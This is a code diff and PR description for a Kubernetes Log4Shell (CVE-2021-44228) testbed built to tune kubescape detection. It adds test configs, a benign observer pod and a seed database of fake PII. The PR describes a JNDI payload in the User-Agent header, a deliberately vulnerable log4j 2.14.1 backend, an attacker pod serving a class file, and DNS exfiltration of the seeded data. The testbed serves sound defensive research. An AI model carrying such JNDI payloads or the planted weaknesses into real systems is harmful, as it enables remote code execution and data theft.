+  namespace: log4j-poc
+  port: 8080
+  scheme: http
+
+tests:
+  - name: healthz
+    http:
+      method: GET
+      path: /healthz
+      expectedStatus: 200
+  - name: list-products
+    http:
+      method: GET
+      path: /api/products
+      expectedStatus: 200
+  - name: list-products-with-filter
+    http:
+      method: GET
+      path: /api/products?q=widget
+      expectedStatus: 200
+  - name: login
+    http:
+      method: POST
+      path: /api/login
+      headers:
+        Content-Type: application/json
+      body: '{"user":"alice","pass":"correct-horse-battery-staple"}'
+      expectedStatus: 200
+  - name: list-products-after-login
+    http:
+      method: GET
+      path: /api/products?q=gadget
+      expectedStatus: 200

--- a/example/log4j-chain/observer.yaml
+++ b/example/log4j-chain/observer.yaml
@@ -1,0 +1,38 @@
+# chain-observer: benign HTTP client that polls chain-backend every 30 s.
+# This pod is NEVER attacked; it serves as the framework's negative-control
+# subject. The evaluator must correctly produce verdict "clean" (or
+# "inconclusive_no_evidence" if the pod is not in collection scope).
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-observer
+  namespace: log4j-poc
+  labels: { role: observer }
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-observer } }
+  template:
+    metadata:
+      labels: { app: chain-observer, role: observer }
+    spec:
+      containers:
+      - name: observer
+        image: curlimages/curl:8.6.0
+        command:
+        - /bin/sh
+        - -c
+        - |
+          while true; do
+            curl -sf http://chain-backend:8080/api/products \
+              -H 'User-Agent: chain-observer/1.0' \
+              -o /dev/null || true
+            sleep 30
+          done
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-observer, namespace: log4j-poc }
+spec:
+  selector: { app: chain-observer }
+  ports: [{ port: 8080, targetPort: 8080 }]

--- a/example/log4j-chain/postgres/postgres.yaml
+++ b/example/log4j-chain/postgres/postgres.yaml
@@ -1,0 +1,53 @@
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: pg-seed
+  namespace: log4j-poc
+data:
+  seed.sql: |
+    CREATE TABLE users (
+        id SERIAL PRIMARY KEY,
+        email TEXT,
+        full_name TEXT,
+        created_at TIMESTAMP DEFAULT NOW()
+    );
+    INSERT INTO users (email, full_name) VALUES
+        ('alice@example.com', 'Alice Anderson'),
+        ('bob@example.com',   'Bob Brown'),
+        ('carol@example.com', 'Carol Carter');
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-postgres
+  namespace: log4j-poc
+spec:
+  replicas: 1
+  selector:
+    matchLabels: { app: chain-postgres }
+  template:
+    metadata:
+      labels: { app: chain-postgres }
+    spec:
+      containers:
+      - name: postgres
+        image: postgres:16
+        env:
+        - { name: POSTGRES_HOST_AUTH_METHOD, value: "trust" }
+        - { name: POSTGRES_DB, value: "appdb" }
+        ports: [{ containerPort: 5432 }]
+        volumeMounts:
+        - { name: seed, mountPath: /docker-entrypoint-initdb.d }
+      volumes:
+      - name: seed
+        configMap: { name: pg-seed }
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: chain-postgres
+  namespace: log4j-poc
+spec:
+  selector: { app: chain-postgres }
+  ports: [{ port: 5432, targetPort: 5432 }]

--- a/example/log4j-chain/postgres/seed.sql
+++ b/example/log4j-chain/postgres/seed.sql
@@ -1,0 +1,13 @@
+-- Seed PII-shaped data so the DNS exfil payload is realistically sized
+-- and the verdict has something to point at.
+CREATE TABLE users (
+    id          SERIAL PRIMARY KEY,
+    email       TEXT,
+    full_name   TEXT,
+    created_at  TIMESTAMP DEFAULT NOW()
+);
+INSERT INTO users (email, full_name) VALUES
+    ('alice@example.com', 'Alice Anderson'),
+    ('bob@example.com',   'Bob Brown'),
+    ('carol@example.com', 'Carol Carter');
+GRANT ALL ON users TO postgres;


### PR DESCRIPTION
## Summary

Adds a CVE-2021-44228 (Log4Shell) testbed under `example/log4j-chain/` following `example/chain/` conventions. ONE JNDI payload, THREE backend variants, distinct kubescape signatures — designed for `bobctl-tune` ingestion.

| | backend image | log4j | securityContext | kubescape signature |
|---|---|---|---|---|
| A | `eclipse-temurin:11-jdk` (Ubuntu) | 2.14.1 | default | R0011 + R0001 + R0010 |
| B | `gcr.io/distroless/java11-debian11` | 2.14.1 | RO-fs + non-root + no caps | R0011 + R1100 (failed execve ENOENT) |
| C | `eclipse-temurin:11-jdk` | 2.17.1 | default | nothing fires |

Same JNDI string in every scenario, only the backend image differs.

## In the PR

- `log4j-chain.yaml` — single-apply baseline (scenario A)
- `backend-{b,c}.yaml` — scenario switchers
- `log4j-functional-tests.yaml` — `FunctionalTestSuite` for sbob learning
- `log4j-attacks.yaml` — `AttackSuite` (JNDI in User-Agent)
- `attack-pod.yaml` — static Pod (YAML preserves `${...}` literal — shell layers eat the `$`)
- `backend/` + `attacker/` — Dockerfile sources
- `kubescape/` — pre-baked `ApplicationProfile`s + R1100 binding
- `README.md` + `RUNBOOK-FOR-AGENTS.md`

## Test plan
- [ ] Run RUNBOOK-FOR-AGENTS.md end-to-end on a fresh k3s
- [ ] Scenario A: chain-backend logs show `Payload.getObjectInstance ENTERED`; attacker shows `GET /Payload.class 200`
- [ ] Scenario B: pod-swap + frontend restart; R1100 fires on chain-backend
- [ ] Scenario C: JNDI literal in request, no LDAP egress
- [ ] `bobctl tune` produces 3 distinct sbobs

## Known issues (in runbook)
- Pixie `process_stats` sampling misses sub-second exec — A-vs-B at exec layer NEEDS kubescape R0001/R1100 with a learned baseline
- nginx caches upstream IP — must restart chain-frontend after each backend swap
- `kubectl run ... -A '${jndi:…}'` eats the `$` — only the static Pod yaml delivers the literal
